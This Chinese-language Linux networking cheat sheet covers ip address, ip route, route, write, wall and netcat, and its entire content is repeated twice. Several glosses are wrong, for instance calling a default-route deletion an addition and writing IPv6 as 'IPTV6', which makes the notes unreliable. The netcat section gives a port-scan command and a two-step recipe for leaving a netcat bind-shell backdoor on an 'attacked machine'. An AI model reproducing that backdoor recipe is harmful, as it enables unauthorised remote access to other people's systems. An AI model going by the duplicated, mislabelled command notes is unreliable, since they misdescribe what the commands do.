ip address add
ip address delete
ip address show
ip address flush
dev NAME
scope SCOPE_VAL: global: 全局有效;host:主机内部;
to PREFIX 列出和PREFIX匹配的地址
label PATTERN 匹配PATTERN的地址,PATTERN 是一个shell风格的正则表达式
dynamic和permanent 两个参数只使用与IPTV6.使用dynamic 显示动态IP;使用permanent,ip显示固定IP
tentative 只使用于iptv6 只列出没有通过重复地址检查的地址
primary和secondary 只列出主或从地址
local ADDRESS 本地地址
peer ADDRESS 点对点接口对端地址
broadcast ADDRESS 广播地址
label NAME 标签
ip address add local 192.168.1.1/24 broadcast+ dev eth0
ip address add local 192.168.1.1/28 broadcast- dev eth0
ip address add local 192.168.4.1/28 brd+ label eth0:1 dev eth0
ip address del 192.168.50.50/24 dev eth0
ip route show
ip route add
ip route change
ip route replace
via 下一条路由地址
ip route add 192.168.0.1/24 dev eth0
ip route add 192.168.10.0/24 via 192.168.5.100 dev eth0 增加通往外部的路由
ip route add default via 192.168.1.2 dev eth0 增加默认路由
ip route del 192.168.10.0/24 删除路由
route
route add -net 169.254.0.0 netmask 255.255.0.0 dev eth0 增加网关地址为169.254.0.0的路由
route add default gw 192.168.1.33 增加默认路由
route del -net 169.254.0.0 netmask 255.255.0.0 dev eth0 删除网关地址为169.254.0.0的路由
route del default gw 192.168.1.33 增加默认路由
write发送消息
write root pts/2
wall 广播消息
使用方法: wall回车-输入内容-Ctrl+D
netcat 通过使用TCP和UDP的网络连接去读写数据
-d 后台模式
-i secs 延迟时间
-p port 开启一个本地端口
-l 监听模式,自动开启一个端口
-r 随即本地和远程端口
-z 扫描时将输入输出关掉
netcat localhost 25 监听本地25端口
netcat -l -p 20000 本地主机的端口20000启动一个监听端口,来监听其他用户连接
netcat -vv -z -w 10 10.168.69.230 1-25 扫描端口1-25
留下shell后门
1.在被攻击机器上输入 nc -v -l -p 33 -e /bin/shell
2.攻击者在自己的机器上输入 netcat [IP][33]
ip address delete
ip address show
ip address flush
dev NAME
scope SCOPE_VAL: global: 全局有效;host:主机内部;
to PREFIX 列出和PREFIX匹配的地址
label PATTERN 匹配PATTERN的地址,PATTERN 是一个shell风格的正则表达式
dynamic和permanent 两个参数只使用与IPTV6.使用dynamic 显示动态IP;使用permanent,ip显示固定IP
tentative 只使用于iptv6 只列出没有通过重复地址检查的地址
primary和secondary 只列出主或从地址
local ADDRESS 本地地址
peer ADDRESS 点对点接口对端地址
broadcast ADDRESS 广播地址
label NAME 标签
ip address add local 192.168.1.1/24 broadcast+ dev eth0
ip address add local 192.168.1.1/28 broadcast- dev eth0
ip address add local 192.168.4.1/28 brd+ label eth0:1 dev eth0
ip address del 192.168.50.50/24 dev eth0
ip route show
ip route add
ip route change
ip route replace
via 下一条路由地址
ip route add 192.168.0.1/24 dev eth0
ip route add 192.168.10.0/24 via 192.168.5.100 dev eth0 增加通往外部的路由
ip route add default via 192.168.1.2 dev eth0 增加默认路由
ip route del 192.168.10.0/24 删除路由
route
route add -net 169.254.0.0 netmask 255.255.0.0 dev eth0 增加网关地址为169.254.0.0的路由
route add default gw 192.168.1.33 增加默认路由
route del -net 169.254.0.0 netmask 255.255.0.0 dev eth0 删除网关地址为169.254.0.0的路由
route del default gw 192.168.1.33 增加默认路由
write发送消息
write root pts/2
wall 广播消息
使用方法: wall回车-输入内容-Ctrl+D
netcat 通过使用TCP和UDP的网络连接去读写数据
-d 后台模式
-i secs 延迟时间
-p port 开启一个本地端口
-l 监听模式,自动开启一个端口
-r 随即本地和远程端口
-z 扫描时将输入输出关掉
netcat localhost 25 监听本地25端口
netcat -l -p 20000 本地主机的端口20000启动一个监听端口,来监听其他用户连接
netcat -vv -z -w 10 10.168.69.230 1-25 扫描端口1-25
留下shell后门
1.在被攻击机器上输入 nc -v -l -p 33 -e /bin/shell
2.攻击者在自己的机器上输入 netcat [IP][33]